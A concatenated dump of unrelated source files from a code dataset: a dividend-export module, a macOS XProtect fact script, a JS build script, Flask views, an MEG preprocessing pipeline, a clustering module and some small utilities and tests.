self.option(\"listen\")\n","sub_path":"bountydns/cli/dns/dns_server.py","file_name":"dns_server.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"199632399","text":"''' =====================================================================\n Dividend Extract\n\n This module exposes functions to extract dividend data from given\n streams as well as build up the index dividend data (converted to\n index points) of a given index.\n \n Note that this module is used in the dividend upload to ME.\n\n Eben Mare\n \n \n CR492813 - Eben Mare, Convert realised dividends to be outputed in cents (multiply by 100)\n ABITFA-3046: TCU, Type column for dividend estimates wanted for ME contribution\n PRMW787 - CHNG0003297785 : Use FPriceLinkDefinition instead of FPriceDefinition for getting RIC code for instruments\n\t\n ===================================================================== '''\n\nimport ael, acm\nimport re\nfrom DateUtils import PDate\n\nINDEX_HEADER = (\"Stock\", \"Ex-Date\", \"Amount\", \"Pay-Date\", \"Type\", \"Comment\", \"FADivType\")\nSS_HEADER = (\"Stock\", \"Ex-Date\", \"Amount\", \"Pay-Date\", \"Type\", \"Comment\", \"FADivType\")\nDATE_FORMAT = \"%Y-%m-%d\"\nSPOTMARKET = 10\nRICMappings = {}\n\ndef MapDivType(div):\n #Maps the dividend type to the BarCap Standard.\n descript = div.description.lower()\n if re.compile(\"f.*\").match(descript):\n return \"Final\"\n elif re.compile(\"i.*\").match(descript):\n return \"Interim\"\n else: return \"Interim\"\n\ndef MapFrontTickerToRIC(stock):\n if stock in RICMappings:\n return RICMappings[stock]\n else:\n price_link = acm.FPriceLinkDefinition.Select(\"instrument = %d and market = %d\" % (ael.Instrument[stock].insaddr, SPOTMARKET) ) #Filter on the SPOT market\n \n if price_link:\n ReutersRIC = price_link[0].IdpCode() \n if len(price_link) > 1:\n if price_link[1].PriceDistributor().Name() == \"REUTERS_FEED_1\":\n ReutersRIC = price_link[1].IdpCode()\n \n RICMappings[stock] = ReutersRIC\n return ReutersRIC and ReutersRIC\n\ndef IsValidForME(div):\n #Special divs aren't sent through to ME; Simulated, Final and Interim divs are.\n return re.compile(\"simulated|(f.*)|(i.*)\").match(div.description.lower()) and True or False\n\ndef GetInstrActualDivs(insName):\n return list(ael.Dividend.select(\"insaddr = %d\" % ael.Instrument[insName].insaddr))\n\ndef GetInstrDivEstimates(insName):\n stream = ael.DividendStream.select(\"insaddr = %d\" % ael.Instrument[insName].insaddr)\n return stream and stream[0].estimates()\n\ndef GetInstrWeightInIndex(insName, indexName):\n insaddr = ael.Instrument[insName].insaddr\n for lnk in ael.Instrument[indexName].combination_links():\n if lnk.member_insaddr.insaddr == insaddr: return lnk.weight\n\ndef GetIndexConstituents(indexName):\n return [lnk.member_insaddr.insid for lnk in ael.Instrument[indexName].combination_links().members()]\n\ndef GetWeightedIndexDivsDetail(indexName):\n divs = []\n index_factor = ael.Instrument[indexName].index_factor\n for insid in GetIndexConstituents(indexName):\n intrWeight = GetInstrWeightInIndex(insid, indexName)\n estimates = GetInstrDivEstimates(insid)\n for est in estimates:\n if est.ex_div_day > ael.date_today() and IsValidForME(est):\n divs.append( (MapFrontTickerToRIC(indexName), est.ex_div_day, est.dividend * intrWeight / index_factor, est.pay_day, MapDivType(est), MapFrontTickerToRIC(insid)) )\n\n return divs\n\ndef GetInstrActualDivsDetail(insName):\n return [ (MapFrontTickerToRIC(insName), PDate(d.ex_div_day).strftime(), d.dividend*100, PDate(d.pay_day).strftime(), MapDivType(d), \"\", \"\") \\\n for d in GetInstrActualDivs(insName) if IsValidForME(d)]\n\ndef GetInstrDivsEstDetail(insName):\n return [ (MapFrontTickerToRIC(insName), PDate(e.ex_div_day).strftime(), e.dividend*100, PDate(e.pay_day).strftime(), MapDivType(e), \"\", GetDividentType(e) ) \\\n for e in GetInstrDivEstimates(insName) if IsValidForME(e)]\n\ndef GetDividentType(div_est):\n val = div_est.dividend_type\n out_val=\"\" \n \n if val == \"Declared\":\n out_val =\"Declared\"\n\n return out_val\n\ndef _formatDivs(divs):\n return \"\\n\".join([\",\".join(map(str, div)) for div in divs])\n \ndef SaveDivsToFile(instrList, filename, divType):\n divs = []\n for insid in instrList:\n if divType == \"ssdivs\":\n #Add historical divs as well as estimates\n divs.extend(GetInstrActualDivsDetail(insid))\n divs.extend(GetInstrDivsEstDetail(insid))\n elif divType == \"indexdivs\":\n divs.extend(GetWeightedIndexDivsDetail(insid))\n \n #We will sort the list by stock name and then by ex-div day\n #note python has stable sort so we sort in reverse.\n divs.sort(lambda x, y: cmp(PDate(x[1], DATE_FORMAT), PDate(y[1], DATE_FORMAT))) #Sort by Ex-div Day\n divs.sort(lambda x, y: cmp(x[0], y[0])) #Sort by Stock Name\n\n #Get Header to use\n if divType == \"ssdivs\":\n header = SS_HEADER\n elif divType == \"indexdivs\":\n header = INDEX_HEADER\n\n file = open(filename, \"w\")\n try:\n file.write(\",\".join(header) + \"\\n\" + _formatDivs(divs))\n finally:\n file.close()\n\ndef SaveSSDivsToFile(instrList, filename):\n SaveDivsToFile(instrList, filename, \"ssdivs\")\n\ndef SaveIndexDivsToFile(instrList, filename):\n SaveDivsToFile(instrList, filename, \"indexdivs\")\n\ndef test():\n SaveSSDivsToFile([\"ZAR/ABL\", \"ZAR/ACL\", \"ZAR/GFI\", \"ZAR/MRP\"], r\"C:\\temp\\ssdivs.txt\")\n SaveIndexDivsToFile([\"ZAR/ALSI\", \"ZAR/SWIX\"], r\"C:\\temp\\indexdivs.txt\")\n","sub_path":"Python modules/SAEQ_DIV_EXTRACT.py","file_name":"SAEQ_DIV_EXTRACT.py","file_ext":"py","file_size_in_byte":5517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"500878290","text":"import sys\nsys.path.append('..')\nfrom game_env.envv2 import *\n# from envv2 import *\nfrom configs import ALL_PLAYER_ACTIONS\n\nif __name__ == '__main__':\n # set_global_seeds(DQNSetting.SEED)\n Game = GatherMultEnv()\n # Game.visual = True\n Game.reset()\n\n print(Game.observation_space)\n while True:\n actions = {'agent-0':random.choice(ALL_PLAYER_ACTIONS), 'agent-1':random.choice(ALL_PLAYER_ACTIONS)}\n observations, rewards, dones, info =Game.step(actions)\n # print(rewards)\n \n\n","sub_path":"test/test_gathering.py","file_name":"test_gathering.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"520774395","text":"import plistlib\nimport subprocess\nimport time\n\nfactoid = \"xprotect_date\"\n\n\ndef fact():\n \"\"\"Returns the last date xprotect was updated\"\"\"\n\n result = \"None\"\n\n try:\n cmd = [\"/usr/sbin/pkgutil\", \"--pkgs=.*XProtect.*\"]\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n (pkgs, stderr) = proc.communicate()\n\n if pkgs:\n dates = []\n for pkgid in pkgs.splitlines():\n pkginfo_plist = subprocess.check_output(\n [\"/usr/sbin/pkgutil\", \"--pkg-info-plist\", pkgid]\n )\n pkginfo = plistlib.loads(pkginfo_plist)\n dates.append(pkginfo[\"install-time\"])\n\n result = time.strftime(\"%Y-%m-%dT%H:%M:%S\", time.localtime(max(dates)))\n except (OSError, IOError):\n pass\n\n return {factoid: result}\n\n\nif __name__ == \"__main__\":\n print(\"%s\" % fact()[factoid])\n","sub_path":"artifacts/xprotect_date.py","file_name":"xprotect_date.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"580127285","text":"import os, shutil, sys, re, subprocess\nimport caf_module\nfrom jsmin import jsmin\n\ndef copy_folder(src, dst, all_folder = False):\n\tif not os.path.exists(dst):\n\t\tos.mkdir(dst)\n\tfor root, dirs, files in os.walk(src):\n\t\tfor file in files:\n\t\t\tif not file.endswith('.tar') and not file.endswith('.zip') and not file == '.DS_Store' and not file == 'index.html' and not file == 'app.json':\n\t\t\t\tshutil.copyfile(root + '/' + file, dst + '/' + file)\n\n\t\tfor dir in dirs:\n\t\t\tif dir.startswith('.'):\n\t\t\t\tdirs.remove(dir)\n\t\tif all_folder:\n\t\t\tfor dir in dirs:\n\t\t\t\tcopy_folder(src + '/' + dir, dst + '/' + dir, all_folder)\n\t\telse:\n\t\t\tbreak\n\n\ndef build_framework(root_path, build_path, framework_path, option='--release'):\n\tos.chdir(build_path)\n\tos.chdir('../')\n\tif option == '--debug':\n\t\trelease = False\n\t\tdebug = True\n\telif option == '--release':\n\t\trelease = True\n\t\tdebug = False\n\telif option == '--all':\n\t\trelease = True\n\t\tdebug = True\n\tif release:\n\t\tos.mkdir('caf')\n\t\tos.chdir('caf')\n\t\tos.mkdir('res')\n\t\tos.mkdir('res/css')\n\t\tos.mkdir('lib')\n\t\tcopy_folder(framework_path + '/res/css', 'res/css')\n\t\tos.chdir('lib')\n\t\taui_lib = open('aui.lib.js', 'w')\n\t\taui_lib.write(jsmin(caf_module.lib_out(framework_path + '/src', 'aui.lib.js')))\n\t\taui_lib.close()\n\t\tcaf_lib = open('caf.lib.js', 'w')\n\t\tcaf_lib.write(jsmin(caf_module.lib_out(framework_path + '/src', 'caf.lib.js')))\n\t\tcaf_lib.close()\n\t\taui_tpl = open('aui.tpl.js', 'w')\n\t\taui_tpl.write(jsmin(caf_module.tpl_out(framework_path + '/src', 'aui.tpl.js')))\n\t\taui_tpl.close()\n\t\tos.chdir(build_path)\n\t\tos.chdir('../')\n\t\tif sys.version.startswith('2.7'):\n\t\t\tshutil.make_archive('caf.min', 'zip', './', 'caf')\n\t\t\tshutil.rmtree('caf')\n\t\telse:\n\t\t\tsubprocess.call(['tar', 'cvzf', 'caf.min' + '.zip', 'caf'])\n\t\t\tsubprocess.call(['rm', '-rf', 'caf'])\n\tif debug:\n\t\tos.mkdir('caf')\n\t\tos.chdir('caf')\n\t\tos.mkdir('res')\n\t\tos.mkdir('res/css')\n\t\tos.mkdir('lib')\n\t\tcopy_folder(framework_path + '/res/css', 'res/css')\n\t\tos.chdir('lib')\n\t\taui_lib = open('aui.lib.js', 'w')\n\t\taui_lib.write(caf_module.lib_out(framework_path + '/src', 'aui.lib.js'))\n\t\taui_lib.close()\n\t\tcaf_lib = open('caf.lib.js', 'w')\n\t\tcaf_lib.write(caf_module.lib_out(framework_path + '/src', 'caf.lib.js'))\n\t\tcaf_lib.close()\n\t\taui_tpl = open('aui.tpl.js', 'w')\n\t\taui_tpl.write(caf_module.tpl_out(framework_path + '/src', 'aui.tpl.js'))\n\t\taui_tpl.close()\n\t\tos.chdir(build_path)\n\t\tos.chdir('../')\n\t\tif sys.version.startswith('2.7'):\n\t\t\tshutil.make_archive('caf', 'zip', './', 'caf')\n\t\t\tshutil.rmtree('caf')\n\t\telse:\n\t\t\tsubprocess.call(['tar', 'cvzf', 'caf' + '.zip', 'caf'])\n\t\t\tsubprocess.call(['rm', '-rf', 'caf'])\n\tos.chdir(build_path)\n\treturn {'status':'ok', 'msg':'build success'}\n\ndef build_app(app_name, root_path, build_path, framework_path, option='--release'):\n\tos.chdir(root_path)\n\tos.chdir('apps')\n\tif not os.path.exists(app_name):\n\t\treturn {'status':'err', 'msg':'app doen\\'t exists'}\n\tos.chdir(app_name)\n\tapp_path = os.getcwd()\n\tdest_path = app_path + '/' + app_name\n\tcopy_folder('./', app_name)\n\ttry:\n\t\topen('app.json').close()\n\t\thtml_string = caf_module.html_out(root_path + '/', app_name)\n\texcept:\n\t\tindex_html = open('index.html')\n\t\thtml_string = index_html.read()\n\t\tindex_html.close()\n\tif option != '--debug':\n\t\thtml_string = html_string.replace('true', 'false')\n\t\thtml_string = html_string.replace('core_shield: false', 'core_shield: true')\n\t\thtml_string = html_string.replace('core_shield:false', 'core_shield: true')\n\t\thtml_string = html_string.replace('\"active\": false', '\"active\": true')\n\t\thtml_string = html_string.replace('\"active\":false', '\"active\": true')\n\thtml_string = html_string.replace('/framework/', '')\n\tif os.path.exists('lib'):\n\t\tcopy_folder('lib', app_name + '/' + 'lib', True)\n\telse:\n\t\tos.mkdir(app_name + '/lib')\n\tos.chdir(app_name)\n\t_index_html = open('index.html', 'w')\n\t_index_html.write(html_string)\n\t_index_html.close()\n\tif not os.path.exists('res'):\n\t\tos.mkdir('res')\n\tcopy_folder('../res/css', 'res/css', True)\n\tcopy_folder('../res/images', 'res/images', True)\n\tcopy_folder(framework_path + '/res/css', 'res/css')\n\tlibs = [\n\t\t['lib/' + app_name + '.lib.js', '../src', app_name + '.lib.js'],\n\t\t['lib/' + 'aui.lib.js', framework_path + '/src', 'aui.lib.js'],\n\t\t['lib/' + 'caf.lib.js', framework_path + '/src', 'caf.lib.js']\n\t]\n\tfor lib in libs:\n\t\t_lib = open(lib[0], 'w')\n\t\t_lib.write(jsmin(caf_module.lib_out(lib[1], lib[2])))\n\t\t_lib.close()\n\ttpls = [\n\t\t['lib/' + app_name + '.tpl.js', '../src', app_name + '.tpl.js'],\n\t\t['lib/aui.tpl.js', framework_path + '/src', 'aui.tpl.js']\n\t]\n\tfor tpl in tpls:\n\t\t_tpl = open(tpl[0], 'w')\n\t\t_tpl.write(jsmin(caf_module.tpl_out(tpl[1], tpl[2])))\n\t\t_tpl.close()\n\tos.chdir('../')\n\tif sys.version.startswith('2.7'):\n\t\tshutil.make_archive(app_name, 'zip', './', app_name)\n\t\tshutil.rmtree(app_name)\n\telse:\n\t\tsubprocess.call(['tar', 'cvzf', app_name + '.zip', app_name])\n\t\tsubprocess.call(['rm', '-rf', app_name])\n\tshutil.move(app_name + '.zip', build_path + '/../' + app_name + '.zip')\n\tos.chdir(build_path)\n\treturn {'status':'ok', 'msg':'build success'}\n\ndef main(app_name, option='--release'):\n\tbuild_path = os.getcwd()\n\troot_path = os.getcwd() + '/../../'\n\troot_path = os.path.abspath(root_path)\n\tframework_path = root_path + '/' + 'framework'\n\tif app_name.lower() == 'caf':\n\t\treturn build_framework(root_path, build_path, framework_path, option)\n\telse:\n\t\treturn build_app(app_name, root_path, build_path, framework_path, option)\n\nif __name__ == '__main__':\n\tmain()","sub_path":"caf/build/libs/caf_build.py","file_name":"caf_build.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"576197646","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"runMonitorRecoPU\")\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(-1)\n)\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring('file:reco.root')\n)\n\nprocess.load(\"fabiocos.CMSSWUtil.MonitorRecoPU_cfi\")\n\nprocess.MessageLogger.categories=cms.untracked.vstring('FwkJob'\n ,'FwkReport'\n ,'FwkSummary'\n ,'Root_NoDictionary'\n ,'RecoPUInfo'\n)\n \n\nprocess.MessageLogger.cerr.INFO = cms.untracked.PSet(limit = cms.untracked.int32(-1))\nprocess.MessageLogger.cerr.RecoPUInfo = cms.untracked.PSet(limit = cms.untracked.int32(-1))\nprocess.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(10000)\n\nprocess.TFileService = cms.Service(\"TFileService\", fileName = cms.string(\"monitorRecoPU_histo.root\") )\n\nprocess.p = cms.Path(process.monitorRecoPU)\n\n\n","sub_path":"test/runMonitorRecoPU_cfg.py","file_name":"runMonitorRecoPU_cfg.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"374227085","text":"import sys\ndef accumulate():\n tally = 0\n while 1:\n next = yield\n if next is None:\n return tally\n tally += next\n\n\ndef gather_tallies(tallies):\n while 1:\n tally = yield from accumulate()\n tallies.append(tally)\n\n\n\ntallies = []\nacc = gather_tallies(tallies)\nnext(acc) # Ensure the accumulator is ready to accept values\nfor i in range(4):\n acc.send(i)\nacc.send(None) # Finish the first tally\nfor i in range(5):\n acc.send(i)\n\nacc.send(None) # Finish the second tally\nprint(tallies)\n\n\n\ndef yieldtest():\n i = 0\n while 1:\n m = yield\n i += 1\n print(i)\n if i > m: return i\n\n\ndef yieldmain(m):\n while 1:\n x = yield from yieldtest()\n print(x)\n\na = yieldmain(5)\nnext(a)\nfor i in range(5):\n a.send(i)","sub_path":"yeald_test.py","file_name":"yeald_test.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"309725453","text":"import json\n\nimport pandas as pd\nfrom sklearn.cluster import KMeans\n\nfrom backend.inference_core.utils import robustScaler2\nfrom backend.server.database.schemas.algorithms.cluster import KMeansCluster\n\n\ndef get_params():\n return list(range(2, 21))\n\n\ndef get_kmeans_count():\n n_clusters = get_params()\n return len(n_clusters)\n\n\ndef kmeans(data, n_clusters, init_centers=None):\n clf = KMeans(\n n_clusters=n_clusters,\n init=\"k-means++\" if init_centers is None else init_centers,\n random_state=0,\n )\n clf.fit(data)\n labels = clf.labels_\n centers = clf.cluster_centers_\n return labels, centers, n_clusters\n\n\ndef computeKMeansClusters(data: pd.DataFrame, dimensions, record_id):\n n_clusters = get_params()\n\n scaler = robustScaler2(data.values)\n scaled_data = scaler.transform(data.values)\n\n results = [kmeans(scaled_data, n) for n in n_clusters]\n\n infos = [\n {\n \"params\": {\"n_clusters\": n_cluster},\n \"centers\": (scaler.inverse_transform(centers)).tolist(), # type:ignore\n }\n for _, centers, n_cluster in results\n ]\n\n rets = [\n (\",\".join(map(str, labels)), json.dumps(info)) # type: ignore\n for (labels, _c, _n), info in zip(results, infos)\n ]\n\n return [\n KMeansCluster(\n dimensions=dimensions,\n output=output,\n info=params,\n record_id=record_id,\n )\n for output, params in rets\n ]\n","sub_path":"backend/inference_core/algorithms/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"35786510","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport sys\n\nimport numpy as np\n\nfrom tensorflow.python.platform import app\n\nFLAGS = None\n\n\ndef load_weights_and_biases_to_numpy_array_from_checkpoint_file(numpy_file_name):\n try:\n variable_scope_to_name_to_value_dict = np.load(numpy_file_name).item()\n print(variable_scope_to_name_to_value_dict)\n except Exception as e: # pylint: disable=broad-except\n print(str(e))\n\n\ndef main(unused_argv):\n if not FLAGS.file_name:\n print(\n \"Usage: save_tf_checkpoint_to_numpy.py --file_name=numpy_data_file_path\")\n sys.exit(1)\n else:\n load_weights_and_biases_to_numpy_array_from_checkpoint_file(FLAGS.file_name)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.register(\"type\", \"bool\", lambda v: v.lower() == \"true\")\n parser.add_argument(\n \"--file_name\", type=str, default=\"\", help=\"Checkpoint filename. \"\n \"Note, if using Checkpoint V2 format, file_name is the \"\n \"shared prefix between all files in the checkpoint.\")\n FLAGS, unparsed = parser.parse_known_args()\n app.run(main=main, argv=[sys.argv[0]] + unparsed)\n","sub_path":"save_tf_checkpoint_to_numpy_test.py","file_name":"save_tf_checkpoint_to_numpy_test.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"429600269","text":"import os.path as op\nimport warnings\nimport numpy as np\n\nfrom mne import find_events, Epochs, pick_types\nfrom mne.epochs import concatenate_epochs\nfrom mne.io import Raw\n\nfrom jr.meg import least_square_reference\nfrom jr.meg.artefact import detect_bad_channels\n\nfrom files.base import paths\nfrom files.data_path import data_path as global_data_path\n\n\ndef preprocess_raw(fname, l_freq=.51, h_freq=30.):\n import matplotlib.pyplot as plt\n # Read\n raw = Raw(fname, preload=True)\n\n print('Known bad channels: ', raw.info['bads'])\n picks = pick_types(raw.info, meg=True)\n\n # Only axial grad, not reference magnetometers\n picks = np.where([ch['coil_type'] == 6001 for ch in raw.info['chs']])[0]\n error_chan, _ = detect_bad_channels(raw, picks=picks)\n plt.plot(error_chan)\n plt.show()\n threshold = 5 * np.percentile(error_chan, 70)\n for ch in np.where(error_chan > threshold)[0]:\n ch_name = raw.ch_names[picks[ch]]\n warnings.warn('%s appeared to be bad' % ch_name)\n raw.info['bads'] += [ch_name]\n\n # Apply Least Square projection from ref channels\n raw = least_square_reference(raw)\n\n # Interpolate bad channels\n raw.interpolate_bads()\n\n # Apply Least Square projection from ref channels\n raw = least_square_reference(raw)\n\n # Filter\n raw.filter(l_freq, h_freq)\n return raw\n\n\ndef epoch_raws(subject, task, event_id=None, tmin=-.200, tmax=.700,\n l_freq=.51, h_freq=30., data_path=None, overwrite=False):\n data_path = global_data_path if data_path is None else data_path\n n_run = sum([run['typ'] == task for run in subject['meg_files']])\n if n_run == 0:\n warnings.warn('no raw with %s:%s' % (subject['name'], task))\n return\n epochs = None\n for run in range(n_run):\n fname = paths(subject, 'raw', name='%s_%.2i' % (task, run),\n data_path=data_path)\n # Preprocess\n raw = preprocess_raw(fname, l_freq=l_freq, h_freq=h_freq)\n # Epoch\n events = find_events(raw, min_duration=.010)\n epochs_ = Epochs(raw, events, tmin=tmin, tmax=tmax, baseline=None,\n verbose=False, event_id=event_id)\n # Append\n epochs = epochs_ if run == 0 else concatenate_epochs([epochs, epochs_])\n # Save epochs\n fname = paths(subject, 'epochs', name=task, data_path=data_path)\n if not op.exists(fname) or overwrite:\n epochs.save(fname)\n else:\n warnings.warn('%s already exists, need `overwrite=True`' % fname)\n return epochs\n","sub_path":"scripts/analysis/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"346361510","text":"from flask import (\n Blueprint,\n Flask, \n flash, \n redirect, \n render_template, \n request, \n session, \n url_for, \n )\nfrom flask_login import login_required\nfrom flask_sqlalchemy import *\nfrom app.models import (\n db, \n PostHome, \n PostCar, \n )\nfrom app.post.forms import (\n HomeForm, \n CarForm, \n )\nfrom app.utils.scripts import verify_required\nfrom datetime import datetime\n\n\npost_blueprint = Blueprint('post', __name__, template_folder='templates')\n\n# constants\nPOSTS_PER_PAGE = 23\n\n\ndef apply_common_filters():\n pmin, pmax = 0, 0\n city = ''\n if request.args.get('pmin'):\n pmin = int(re.search(r'\\d+', request.args.get('pmin')).group())\n pmax = int(re.search(r'\\d+', request.args.get('pmax')).group())\n city = request.args.get('city')\n\n return pmin, pmax, city\n\n\ndef apply_home_filters():\n beds, baths, parking = 0, 0, 0\n if request.args.get('beds'):\n beds = request.args.get('beds')\n baths = request.args.get('baths')\n parking = request.args.get('parking')\n\n return beds, baths, parking\n\n\ndef apply_car_filters():\n year, make, mileage = 0, '', 0\n if request.args.get('year'):\n year = request.args.get('year')\n make = request.args.get('make')\n mileage = request.args.get('mileage')\n\n return year, make, mileage\n\n\ndef apply_home_prices(pmin, pmax):\n price_min = round(db.session.query(db.func.min(PostHome.price)).scalar() - 1000, -3)\n price_max = round(db.session.query(db.func.max(PostHome.price)).scalar() + 1000, -3)\n if pmin or pmax:\n pmin_filtered = pmin\n pmax_filtered = pmax\n else: \n pmin_filtered = price_min\n pmax_filtered = price_max\n\n return (price_min, price_max, \n pmin_filtered, pmax_filtered )\n\n\ndef apply_car_prices(pmin, pmax):\n price_min = round(db.session.query(db.func.min(PostCar.price)).scalar() - 100, -2)\n price_max = round(db.session.query(db.func.max(PostCar.price)).scalar() + 100, -2)\n if pmin or pmax:\n pmin_filtered = pmin\n pmax_filtered = pmax\n else: \n pmin_filtered = price_min\n pmax_filtered = price_max\n\n return (price_min, price_max, \n pmin_filtered, pmax_filtered )\n\n\n@post_blueprint.route('/homes/' , methods=['GET'])\n@post_blueprint.route('/homes/', methods=['GET'])\ndef show_home_posts(page_num=1):\n try:\n pmin, pmax, city = apply_common_filters()\n beds, baths, parking = apply_home_filters()\n price_min, price_max, pmin_filtered, pmax_filtered = apply_home_prices(pmin, pmax)\n cities = db.session.query(PostHome.city.distinct().label('city')).order_by(PostHome.city).all()\n filtered_posts = (PostHome.query\n .filter(PostHome.price >= pmin_filtered)\n .filter(PostHome.price <= pmax_filtered)\n .filter(PostHome.city.contains(city))\n .filter(PostHome.bedrooms >= beds)\n .filter(PostHome.bathrooms >= baths)\n .order_by(PostHome.id.desc()) )\n filtered_count = filtered_posts.count()\n paginated_posts = filtered_posts.paginate(page_num, POSTS_PER_PAGE, False).items\n posts = paginated_posts\n \n return render_template('/posts.html', \n page='homes', \n price_min=price_min, \n price_max=price_max, \n pmin_filtered=pmin_filtered, \n pmax_filtered=pmax_filtered, \n cities=cities, \n num_results=filtered_count, \n posts=posts, \n today=datetime.now() )\n except:\n abort(404)\n\n\n@post_blueprint.route('/cars/' , methods=['GET'])\n@post_blueprint.route('/cars/', methods=['GET'])\ndef show_car_posts(page_num=1):\n try:\n pmin, pmax, city = apply_common_filters()\n year, make, mileage = apply_car_filters()\n price_min, price_max, pmin_filtered, pmax_filtered = apply_car_prices(pmin, pmax) \n cities = db.session.query(PostCar.city.distinct().label('city')).order_by(PostCar.city).all()\n filtered_posts = (PostCar.query\n .filter(PostCar.price >= pmin_filtered)\n .filter(PostCar.price <= pmax_filtered)\n .filter(PostCar.city.contains(city))\n .filter(PostCar.year >= year)\n .filter(PostCar.make >= make)\n .filter(PostCar.mileage >= mileage)\n .order_by(PostCar.id.desc()) )\n filtered_count = filtered_posts.count()\n paginated_posts = filtered_posts.paginate(page_num, POSTS_PER_PAGE, False).items\n posts = paginated_posts\n \n return render_template('/posts.html', \n page='cars', \n price_min=price_min, \n price_max=price_max, \n pmin_filtered=pmin_filtered, \n pmax_filtered=pmax_filtered, \n num_results=filtered_count, \n cities=cities, \n posts=posts, \n today=datetime.now() )\n except:\n abort(404)\n\n\n@post_blueprint.route('//edit', methods=['GET', 'POST'])\n@login_required\n@verify_required\ndef edit_home_post(page):\n form = HomeForm()\n\n if request.method == 'GET':\n return render_template('home_edit.html', page=page, form=form)\n if request.method == 'POST':\n if form.validate_on_submit():\n \n return render_template('home_edit.html', page=page, form=form)\n else:\n return render_template('home_edit.html', page=page, form=form)\n","sub_path":"app/post/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"458484628","text":"from optparse import OptionParser\n\nif __name__ == \"__main__\":\n import sys\n op = OptionParser(usage='Usage: %prog [options]')\n op.add_option(\"--input\",\n dest=\"fname\",\n help=\"Input file to retag\")\n op.add_option(\"--output\",\n dest=\"oname\",\n help=\"Output file where to place the result\")\n op.add_option(\"--target_column\",\n dest=\"targetcol\",\n help=\"Target column to concat\")\n\n (opts, args) = op.parse_args()\n\n if not opts.fname or not opts.oname:\n print(\"Needed --input --output parameters\")\n sys.exit()\n with open(opts.fname) as f:\n content = f.readlines()\n targetcol = int(opts.targetcol)\n with open(opts.oname, \"w+\") as f:\n for line in content:\n items = line.split(\"\\t\")\n if len(items) < 2:\n f.write('\\n\\n')\n continue\n new_line = items[targetcol] + \" \"\n f.write(new_line)\n","sub_path":"util/conll_to_txt.py","file_name":"conll_to_txt.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"599600754","text":"import csv\n\nticker_list = list()\nprint(\"The tickers will be delimited by spaces...\")\ntickers = input(\"Enter a list of tickers: \")\ntickers = tickers.split(' ')\n\nfor ticker in tickers:\n ticker_list.append(ticker)\n\ncsv_file = input(\"Enter a file to parse data to: \")\n\nwith open(csv_file, 'w') as f:\n w = csv.writer(f, dialect = 'excel', quoting = csv.QUOTE_ALL) \n for word in ticker_list:\n w.writerow([word])\n \nwith open(csv_file, 'r') as my_file:\n reader = csv.reader(my_file, delimiter =' ')\n my_list = list(reader)\n filtered_list = [x for x in my_list if x]\n\ncount = 0\nfull_list = []\nfor items in filtered_list:\n full_list.append(str(items[count]))\n","sub_path":"stock_gui/csv_generator.py","file_name":"csv_generator.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"596509643","text":"import discord\nfrom redbot.core import commands\nfrom redbot.core.bot import Red\nfrom redbot.core.utils.chat_formatting import humanize_list\n\n\nasync def is_allowed_by_hierarchy(bot: Red, mod: discord.Member, member: discord.Member):\n return mod.top_role.position >= member.top_role.position or await bot.is_owner(mod)\n\n\ndef is_allowed_by_role_hierarchy(\n bot: Red,\n bot_me: discord.Member,\n mod: discord.Member,\n role: discord.Role,\n):\n if role.position >= bot_me.top_role.position:\n return (False, f\"I am not higher than `{role}` in hierarchy.\")\n else:\n return (\n (mod.top_role.position > role.position) or mod == mod.guild.owner,\n f\"You are not higher than `{role}` in hierarchy.\",\n )\n\n\ndef humanize_roles(roles: list) -> str:\n return humanize_list([f\"`{role.name}`\" for role in roles])\n\n\nasync def can_run_command(ctx: commands.Context, command: str) -> bool:\n try:\n result = await ctx.bot.get_command(command).can_run(ctx, check_all_parents=True)\n except commands.CommandError:\n result = False\n return result\n","sub_path":"roleutils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"123242643","text":"class Solution:\n def middleNode(self, head: ListNode) -> ListNode:\n count=0\n original=head\n while head.next != None:\n head=head.next\n count+=1\n \n for i in range((count+1)//2):\n original=original.next\n \n return original\n \n \n \n","sub_path":"Middle of the Linked List.py","file_name":"Middle of the Linked 